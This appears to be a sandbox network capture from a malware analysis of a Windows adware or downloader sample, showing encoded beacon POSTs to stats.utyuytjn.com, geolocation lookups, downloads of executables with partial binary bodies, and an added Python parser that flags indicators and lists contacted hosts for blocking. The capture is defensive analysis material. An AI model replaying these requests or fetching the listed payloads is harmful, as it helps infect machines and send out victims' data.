HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024078093
0061341211191062391630470432080711072490250652140881271302152211591681
7324404906313115003706817008006601218713421501620719805002713117624001
5043110151162143165039211105202161193205052130108122003140074166047033
0850550490150541512180700381791721472080041810920191112300060702382420
0516403115511223202715315415716111920511324905201323014814515708614716
4241254099073134029113173081069043065018032063180205049080170005001214
1120290691411921360860131100371921111320801420211881410011370892210762
4620507718218419206914211016801316705110302706608102818617007410821815
0004155018116175057022167242043232111222003244139170153187194126205012
1351001781611730250060950090261161650822332430411400381430521322451100
2816908215207002911914314011914220110615816418511319912505523310206104
2216130193176175041213149198128133182027002099007000044246020228117110
0191470022390630280200330070120540212211322492552091010122440510681621
7803610608001907116417721502109104116008118323502813512207608405809725
0153012011146099179217020173083046224158065022253177099212142110183119
1701631890470011352280582300630351101161372301510330622441602411411421
2218710017813210921706623922016714506501606905805000400210225100705225
3088148123099233204198234085215194187090036150127010198041007117239037
124136182254173148117024059155217170192013199221096087157010013036

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:14 GMT
{"d":"OK"}HTTP/1.1 200 OK..Cache-Control: private..Content-Length: 10.
.Content-Type: application/json; charset=utf-8..Server: Microsoft-IIS/
7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Tue, 29
Aug 2017 21:57:14 GMT..{"d":"OK"}
....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1694
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024078093
0061341211191062391630470432080711072490250652140881271302152211591681
7324404906313115003706817008006601218713421501620719805002713117624001
5043110151162143165039211105202161193205052130108122003140074166047033
0850550490150541512180700381791721472080041810920191112300060702382420
0516403115511223202715315415716111920511324905201323014814515708614716
4241254099073134029113173081069043065018032063180205049080170005001214
1120290691411921360860131100371921111320801420211881410011370892210762
4620507718218419206914211016801316705110302706608102818617007410821815
0004155018116175057022167242043232111222003244139170153187194126205012
1351001781611730250060950090261161650822332430411400381430521322451100
2816908215207002911914314011914220110615816418511319912505523310206104
2216130193176175041213149198128133182027002099007000044246020228117110
0191470022390630280200330070120540212211322492552091010122440510681621
7803610608001907116417721502109104116008118323502813512207608405809725
0153012011146099179217020173083046224158065022253177099212142110183119
1701631890470011352280582300630351101161372301510330622441602411411421
2218710017813210921706623922016714506501606905805000400210225100705225
3088148123099233204198234085215194187090036150127010198041007117239037
124136182254173148117024059155217170192013199221096087157010013036

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:18 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1934
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024010060
0221951810580121350710352371522531262522151410960831490391820320021451
7410816104106415719921613523123402000004810822308209414112608702619618
7167133214067175096186179007048016017195097115089063047142253191197152
1142381870010691990170711902190490190390670260990672170532391542011270
0411417214506412913908324515622325423604311615321618114617506425008003
9222225073247106191208144048101057038136180193084204007152122054047236
0672541161080911742042490781960030370480021742202202140370180501542142
1615701818915402414322016710618920820302415421713325406123413300312708
6226188033132164161088149231216067240023115015024147000196180171068253
0610721830491050460520540780811251841681190580530131341631531102430210
5003304813211503413510709711223324624015409702715810425110919401302607
7194091152105171075239002121110046155015181115137001088129028094163091
1821642302001792071320440190531102420890372182451081470110811492162151
8505313614010024601721611921409912802909203908221618422314113221025302
3005240028112134041180141003243248143079253073219130010164068075004209
1671602450511082361331550131982161501662481970791560030970070061831422
0705417013622200023908000018907119720722325310808321306813219017205601
6176095207232065018027224063141158002241042198200036076211043038245145
065021179181140009186121129016098234121021220137016188181126064044

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:18 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1214
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024168166
2411110850621421692501911820581791812330840592082382010131942482160731
6418505117207912013208816009214905323600701402213710001816108114813104
9009223014179056219130026189227205048115004089212026194230147086075131
1540950452300602232301230740570842361180772271280550441732401020382510
3620901921315004707802919103016905921504809304725217724611517403121019
4230105240050008201226003002028191174093097085015249253208141045112106
1641041532071441782281401210521830440891301390391501060411192161820070
4609323820816116014716224101922818005712301605314721922618020816908706
6135015010043122181207135058170046153005008082156141098075058146029107
0981971491592051250710692452060750030390581421570070510092001501992361
5213023016417108619824709623709122003904407101323023411307005406600312
1194080061124035204232108168196236155043251110169251178129011071106192
0002451651561972260581082171280870842311892421941901511630250481010352
0717918604703221413609423909013023219313313408412824205022102022206506
0167025106081111003171"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:18 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 2510
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024080066
0261491621611282410382251340741031480912031071650811281290121342280902
3319122304413607624718016218320118502112724417913222619302322704018620
1129098236148236211159009141014061010220106242031014076018050173014023
1262371271712442550282161590462272022162422451761742000591471091222211
8101808319317202001505717205101821317600525118815215601712711618000220
9052132227054008025058184092218243028003031236170174061245213192036145
1101802490341500012350900670440990191700930770581161351101400700951740
6124715306518206509524205006317925017125417100315925014500805807911811
1075157010251012040092237180242117230216172148119037138231094202131202
2390100502441612312542301741020401381981431332472011101692382431532280
4611310602603403006705304820612400307116812506617004013905022314218606
0086205255162156223054255186059162246236205037116042088245085182197024
0231340691811640641812322060190952241290481872520312081441840301992450
2111413513703825307713915417200109008304619111825102315215410502003623
5016122182031041199060119003050162097226121131074163129081237183224243
0552342090001360491060510272230710261871220530340661571021381162031920
0302221119713508318423006706522908725022616003705115401606023824619500
1146098167249033019070038192146139191224250120151161029003097039092202
028152017086139039087084081032187102141015132112151226181001026212

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:18 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 3902
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024007218
1870850732312381921131201431440541961191072422381141360422281101760771
1900005802618204011820125504911616020113412310611802707602208216700102
1116153212015103131014099244080243019001113097015044149218013049044058
1290002242351550221071501900902240630590740131911181050051730152040770
6116207104813910616023312702204409202013122606617108003108721618602110
0142139144106038032112102173006194234042102242252210065031230088119169
1580741171870782170690030302380150370661020690801611772361751280841691
6407413810824300220719812607611123805907601224807706107607622413605011
5109096101047024006147252026057136150018109235237206254072019215156128
2521992180431410980511030351311110820631932370140810302430030022050230
7406420308905003119009022822723901716017318711508422508105103619103922
1191235162158135058068076210096047128025204223190124190156041161007054
0001050232200511211060441222351301511571480360841372420990362440892082
3111017508217020719704825212306913924116601212617810107006615218709008
6174241010123059148092143061195213113065123116053153207246229078155119
2031262232102491732360721291772311370780681921240481141851321031030610
6414119305220917905216722002613513701005709109818118623705125320710101
1142057119159107174241069032022035170104115137227080255076076013069238
128137248151229237043122152062130109156025083206083195003011247160

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:18 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1358
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024019151
1290412232011630680391640941910260260930272331191112541961482421262080
9912010022611407322909711019211910518122501603912217708500004304313717
9124105027145124152084024000188096028213194187209174167070156064218153
1460920530490161410500312131082141060541230711890752062331111792420671
3901601917112520503718608003214921323713119114600922701418615621220621
8231147067224133052065153047232089130016059039250194154231222219190018
0720701750341360711520111760490611141931651100300900382191540150932030
3315209301613510007422408617909625414109001714005920718618514304721825
0042164249194060227141041043173102197067212022226010196042077041017213
1710542251681031492391002370370900770671780090932370050410840261730690
4209216114809004000306809605901120418809204100203120715808304301002121
1013094156011037084002008094042210031109058030058204175206021111132044
1950871901020341021882021160432510470270581540421120200800721590812551
6323915609212709914324909713624904407823520609904102001710318221610208
4072100134156065203235122036191187247212218195205075027144136227131173
2551712101232280370071961272311661371391711410020690911260501541901130
66242110167130128039217136"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:18 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1406
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024016018
0670340950392060621031621381831201862462390940721560050280290090990642
0615000922901506120522001416603023011522315020117321417804609217505814
3148088233085068168032132089150242164211237160080047051072180126063119
1560421982202291041441681941422540821692060962551141810342091281772471
0224502815716301525400014617507305215914820119118810818013411725420508
9028230226174043031050105229138251044031128076076169192080149185234208
1192022072410770071392381591471921570321180311671341910970270380991190
9725313105009724218721416022401901409422103011609007703802614817703807
2093092207160083091105046224215160110118096112024222016155071231247116
1590501960441600830591190621410740452250110382450601292450151311651340
8707319602005822815300606711413208104224415908609403212405306612308805
6061029087108166245053019015138254090209164154055078114188215112212117
0652010272211142301942400411320060862122230282500921330810510631591881
1703819909019110219725323820225306400815415512504001202609205410019712
2102199251239149004245197188209003130179155110244113217177172208195021
0801561821482491140630090881521312400980881280030080060492332180672391
1418112514713016110816511505724404305404916012613709001601421204220822
8130"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:19 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1166
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024082212
0270131892050771802230950650180580250851240550710692531181592520092041
2621015112821914913821420806518918710110200601503507601913715603116609
2114175086103122168000186223125169130130084243234205117131184254149193
0620631040590230872540870090860432252272180331821742471240051652370342
3708319705410403208618821400603421824705305202507616003801807117520109
5072106126073107089003251009033224063107217224141227167189093231231220
0501741691302142520831180090990080671411441280630950492552461590131541
7224519401408724714915606324525224922810004722014009619815411210806420
8197084162023021063198092092167012042195028210116206125044082149063033
0652171110302541770641951791812392410100600382390231360382461111500720
9716521308005405115508419919607316719723521116919122020809324522124613
1014227229141171073003063193126158211192071110064131174087112004209068
1770560911860170172510521631940990332522292131362282110650460042261890
50153240099238064102072136154070013024085204"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:19 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1166
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024082212
0270131892050771802230950650180580250851240550710692531181592520092041
2621015112821914913821420806518918710110200601503507601913715603116609
2114175086103122168000186223125169130130084243234205117131184254149193
0620631040590230872540870090860432252272180331821742471240051652370342
3708319705410403208618821400603421824705305202507616003801807117520109
5072106126073107089003251009033224063107217224141227167189093231231220
0501741691302142520831180090990080671411441280630950492552461590131541
7224519401408724714915606324525224922810004722014009619815411210806420
8197084162023021063198092092167012042195028210116206125044082149063033
0652171110302541770641951791812392410100600382390231360382461111500720
9716521308005405115508419919607316719723521116919122020809324522124613
1014227229141171073003063193126158211192071110064131174087112004209068
1770560911860170170440292300091912442431580902452430351302481491541851
82225066185098149125232128163088143028211096"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:19 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1214
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024168166
2411110850621421692501911820581791812330840220872040150182351531891501
5008202407420100800515309920112522506303102112510118308912319915316106
2011023027211251096191061178155250184180226010017102182102116005017175
1911971282461480890750851660371801950062000682371760662391060071480882
4806519018904003602915802109609004709921304909717611414611607015906013
8174086225135056238207047097017005171188135041147061207177088224177229
1371411582431460022480192481831192100540960801472052091251441791030702
3513311106706312509923816614410503514717606421217101008615123104402204
3144020169206090251246194195175052024133207233069245180042167176086054
1061140562281510960521831420830571992051341000261391681550960382500050
2106803620612807206501605810512210402920912804816515806420218113716216
9144117093027121148242060223074198174065175218026228159192251246206000
2522341950682131240022071220211102501431611992291320492512392442152041
5524524711509217520315219824303410114923412215024921012624115901511218
8028205241234107083245"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:19 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1982
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024010060
0221951810580121350710352371522531262522151410960831490391820320021451
7410816104106415719921613523123402000004810822308209414112608702619618
7167133214067175096186179007048016017195097115089063047142253191197152
1142381870010691990170711902190490190390670260990672170532391542011270
0411417214506412913908324515622325423604311615321618114617506425008003
9222225073247106191208144048101057038136180193084204007152122054047236
0672541161080911742042490781960030370480021742202202140370180501542142
1615701818915402414322016710618920820302415421713325406123413300312708
6226188033132164161088149231216067240023115015024147000196180171068253
0610721830491050460520540780811251842362361720621690130242271290820292
1719114900121920413422604414522019923704818325419903816804812606220200
2226170066185119027191094240222069112172136133238106245085241109169106
0290311720990671091502022281950302261541731641532430881731590902080382
3218500607107605205213519201510514203009504718407903515103710605719106
2246194118026038007053057191140108106134115164043065179050083114247115
1522191940240641061781162500001900220362132161611382412411742071561202
1913211607806200508213114504523420621013913816500607901705104110309416
9057076185057126038201157209127203076170020239142234193165177171099240
091199145219172194086160170116003021095176179034189006080208114048

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:19 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1214
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024168166
2411110850621421692501911820581791812330842170891601450782110120341760
2918904420117716819724221922502209210313221708313919420706907904720206
4163077219044084217023205096058050149181176096090071222222055203132048
2141112040730260560351621540781760221150300611150042191660310411911571
6319709521812904314210821614219907016811719104021924305400808913801410
8096249151216218147150077235113183213072049229176236254172248075133227
0781021752270280630071250661341650480470180070642010861981480171731840
7821605013304506702802407016810311113020907911024709014619416311720303
6141155125238242154166082074151143104023232249212003010200198045202004
1140210501231281051542520842030341761622331301660981170580410151352480
2723121510901810211616819518201009224112906013319423403519019221305807
1103010144237000099198147057090129061213208159204010088252101161105161
0282521800242271452511150011670121450322190980151582231570261801971931
3124511017620411911412816216708419414014419206715518611915813106114901
3201065208146046205224"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:19 GMT
{"d":"OK"}..


GET /p.ashx?e=r3 8Pyd9F6DAE3Cc4HiKowuL6dbzJjjozsPLTnml9raFClMIXcvfjiAvELRpepitBzKZ50kz8RPTyCp7gBaLmAnbpHOoKgPrbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPugw5PM1v4VCSA/hy5KOoHpcOMdWydF3qmdPbOQmglGcMHVwcwALnkpTzGrd1qaYrT/x86G1gblWOAcscFJ1r9xERphBdJN6GXYjxBRsCc8TDP45Ec68ZTPv0jifF/l6GPdeKAuFl6o0RTlK2jIuC8gitLYy8gIkejZr7qNb0EkX4cxIGDgk1EiHjE41dAxTp/t1gKvH5sVeXr9JcnVpDRrarVcATOywF31SN rk7zZezTxeuxqeK S59it mSQhSNSh45qAmyElt93bQH5bkaM479BnD01mhb3oMX8fofoEbEUK/lLzsEwg5AepPVk5G17OgBc8Iga2q7Gimry 1ppvFWj5nURHQ/2GZlHsaGxkNa/vJW8ChtAyEG6G02p03x5nPU473iN3gFKkc9X20jhsnfr JnqGlF3qCwRqkDTwEu4miNNOz8wBuFrwejlnHLsZG7yf0b3RaiIiCvz98Qb6fXGzh9ihtl8DD8oXlAmQhvbEFx3DbWU= HTTP/1.1
User-Agent: Moz/5.0 (compatible; MSIE 9.0; Win NT 6.1)
Host: d3jx96othz2l8y.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 22:04:22 GMT
X-Cache: Miss from cloudfront
Via: 1.1 9740f884e58cfb465c19a8a2b144f34f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: oXsmPJqsQd1u6GWN9Q_WcM6AVw30DDjIi4a9lw9O_pKgOq__iHrmDQ==


GET /MaxMind.asmx/GetGeoInfo HTTP/1.1
Host: madmax.utyuytjn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:11 GMT
Content-Length: 184
<?xml version="1.0" encoding="utf-8"?>
<string xmlns="hXXp://temptempuri.org/">194.242.96.218,UA,Ukraine,07,Kharkiv,,49.9808044433594,36.2527008056641,0,0,Kharkivs'ka Oblast'</string>


GET /iplookup/iplookup.php HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: int.dpool.sina.com.cn


HTTP/1.1 200 OK
Server: Sina
Date: Tue, 29 Aug 2017 21:57:35 GMT
Content-Type: text/html; charset=gbk
Content-Length: 20
Connection: close
DPOOL_HEADER: tyr105
Set-Cookie: INTDPOOL=dc04044687467eb79001316b5643db06;Path=/
POOLPOOL: intdpool
DPOOL_LB7_HEADER: skuld145
1.-1.-1...............
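The request above to int.dpool.sina.com.cn repeats a detail first visible at the /jihuo.aspx request: the client emits `User-Agent: User-Agent: Mozilla/5.0 ...`, the header name duplicated inside its own value, which is a cheap and specific thing to alert on. Pulling that, the PE downloads (bodies starting `MZ` or served as `application/octet-stream`) and the 302 redirect to an `.exe` out of a dump in this format is tedious by hand, so the following parser is an added example for this page, not code from the report. The sample text is constructed from three transactions in the capture above with long values abbreviated; the `refang` helper assumes the report's `hXXp` and leading `VVV.` stand for `http` and `www.`.

```python
"""Triage helper for the sandbox HTTP dump format above (added example, not from the report)."""
import re

# Constructed excerpt: three transactions from the capture above, long values abbreviated.
SAMPLE = """\
GET /jihuo.aspx?ODI2Rjk2ODA4RUE1 HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Content-Length: 0


GET /SilentInstaller_dotnet4.exe HTTP/1.1
Host: d21m4u3yvwhf8i.cloudfront.net


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 321536
Server: AmazonS3
MZ......................@.............................................

<<< skipped >>>

GET /?file=bundle HTTP/1.1
Host: VVV.djapp.info
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Location: hXXp://d21m4u3yvwhf8i.cloudfront.net/prepreinstaller_win.exe
0..
"""

REQUEST_RE = re.compile(r"^(GET|POST|HEAD|PUT)\s+(\S+)\s+HTTP/1\.[01]\s*$")
STATUS_RE = re.compile(r"^HTTP/1\.[01]\s+(\d{3})\b")
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9_-]*):\s?(.*)$")


def refang(text):
    """Undo the report's defanging: hXXp -> http, and a leading VVV. is assumed to mean www."""
    text = re.sub(r"\bhXXp(s?)://", r"http\1://", text)
    return re.sub(r"(^|//)VVV\.", r"\1www.", text)


def _read_headers(lines, i):
    """Collect 'Name: value' lines from index i; stop at the first line that is not one."""
    headers = {}
    while i < len(lines):
        m = HEADER_RE.match(lines[i])
        if not m:
            break
        headers[m.group(1).lower()] = m.group(2).strip()
        i += 1
    return headers, i


def parse_capture(text):
    """One record per request line, with the final response that follows it attached."""
    lines = text.splitlines()
    records, current, i = [], None, 0
    while i < len(lines):
        req = REQUEST_RE.match(lines[i])
        if req:
            headers, i = _read_headers(lines, i + 1)
            current = {"method": req.group(1), "path": req.group(2), "host": headers.get("host", ""),
                       "req_headers": headers, "status": None, "resp_headers": {}, "body_preview": ""}
            records.append(current)
            continue
        status = STATUS_RE.match(lines[i])
        if status and current is not None:
            code = int(status.group(1))
            headers, i = _read_headers(lines, i + 1)
            if code == 100:          # interim '100 Continue'; the real response comes later
                continue
            current["status"], current["resp_headers"] = code, headers
            # Whatever non-blank text follows the headers is the start of the body.
            if i < len(lines) and lines[i].strip() and not REQUEST_RE.match(lines[i]):
                current["body_preview"] = lines[i]
            continue
        i += 1
    return records


def triage(record):
    """Indicators worth pulling out of one transaction."""
    flags = []
    if record["req_headers"].get("user-agent", "").lower().startswith("user-agent:"):
        flags.append("doubled-user-agent-header")  # header name embedded in its own value
    ctype = record["resp_headers"].get("content-type", "")
    if record["body_preview"].startswith("MZ") or ctype.startswith("application/octet-stream"):
        flags.append("pe-download")
    if record["resp_headers"].get("location", "").lower().endswith(".exe"):
        flags.append("redirect-to-exe")
    return flags


def unique_hosts(records):
    """Sorted, refanged Host values, ready for a blocklist or a proxy-log hunt."""
    return sorted({refang(r["host"]) for r in records if r["host"]})


if __name__ == "__main__":
    recs = parse_capture(SAMPLE)
    for r in recs:
        print(r["method"], refang(r["host"]) + r["path"], r["status"], triage(r))
    print(unique_hosts(recs))
```

Run against the whole Network Activity section, `unique_hosts` yields the contact list for this sample (jk.yeawindows.com, svc-stats.linkury.com, 360devtraking.website, the two cloudfront.net distributions, VVV.djapp.info, events.fveocylq.net, stats.utyuytjn.com, madmax.utyuytjn.com, int.dpool.sina.com.cn, cdn.piytrwd.com, yeawindows.com). Treat the cloudfront.net and sina.com.cn entries as shared infrastructure: block or hunt on the full URL, not the host, for those.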


GET /apdata/installers/auto/exe/starter.exe HTTP/1.1
Host: cdn.piytrwd.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 29 Aug 2017 21:56:59 GMT
Keep-Alive: timeout=10
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: 1503920630
Cache-Control: max-age=86400
Content-Length: 2554368
Content-Type: application/octet-stream
X-HW: 1504043819.dop001.am4.t,1504043819.cds017.am4.c
Last-Modified: Mon, 28 Aug 2017 11:43:50 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........vbbJ..1J..1
J..1GE.18..1GE.1i..1GE.1...1Co.1O..1J..1...1...1N..1GE.1K..1J..1K..1..
.1K..1RichJ..1........................PE..L......Y.................>
;...........3.......P....@..........................@'...........@....
..............................P..<........5....................&.tN
...R..8...........................x@..@............P..................
.............text....<.......>.................. ..`.rdata..2...
.P.......B..............@..@.data...@M...`...&...N..............@....r
src....5.......6...t..............@..@.reloc..tN....&..P....&.........
....@..B..............................................................
......................................................................
......................................................................
......................................................................
...........................................................J..v.......
...H.J..&...h.KI..)"..Y............L.J......h.KI..."..Y............P.J
..F...h.KI...!..Y............T.J......h.KI...!..Y.h`.J.. .....$.KI...!
..Y.h.KI...!..Y../U....@...J....%...`.J....X.J........P.J........\.J..
......T.J......hH.J....QI.......;.s.j....PI.3...................U.....
S.].VW...M..33..K..}..M...F..E.....f;V.........(......u;.E..x8..~~.s0.
F.j.h......WP.C........t}.F..E.Wj.P.F.......G.V......[.....tY.s0.F..E.
j.h.....6P.C........t:.6.F..~..E..}.PW..^...~..M........(.}.G.}...

<<< skipped >>>

GET /enjoyWiFi/enjoyWIFI.exe HTTP/1.1
Host: yeawindows.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 15 Aug 2017 08:50:16 GMT
Accept-Ranges: bytes
ETag: "c3f3e84a315d31:0"
Server: Microsoft-IIS/7.5
Date: Tue, 29 Aug 2017 21:57:03 GMT
Content-Length: 2152448
MZ......................@...................................0.........
..!..L.!This program cannot be run in DOS mode....$......./.x.k...k...
k....t..x....t.......t..t.......j....H..h...P...p.......e...........P.
......P...N.......p...k...Q.......&.......j...k...j.......j...Richk...
........................PE..L......Y.................f................
........@..........................P!...........@.....................
........................@..................... .H.......p.............
..............0...@............................................text...
.d.......f.................. ..`.rdata...l.......n...j..............@.
.@.data...x........p..................@....gfids...............H......
........@..@.tls.................T..............@....rsrc...@.........
...V..............@..@.reloc..H..... ....... .............@..B........
......................................................................
......................................................................
............................................U...8.P..cU..h.@K.........
].....U... .P..CP..h.@K.........].....U...h.P..#P..h.@K..`......].....
U.....P......h.@K..@......].....U.....P......h.@K.. ......].....U.....
P...H..h.@K.........]........P..v...h.AK......Y...........h..N....P..q
...h.AK......Y......j..*...h AK.....N....P.............P....P....^P..=
...hJAK..x...Y.hTAK..l...Y.h^AK..`...Y.hiAK..T...Y.. `P......hsAK..>
;...Y......U..j.h..K.d.....Pd.%....Q.XaP...?...XaP...XaP.......\aP....
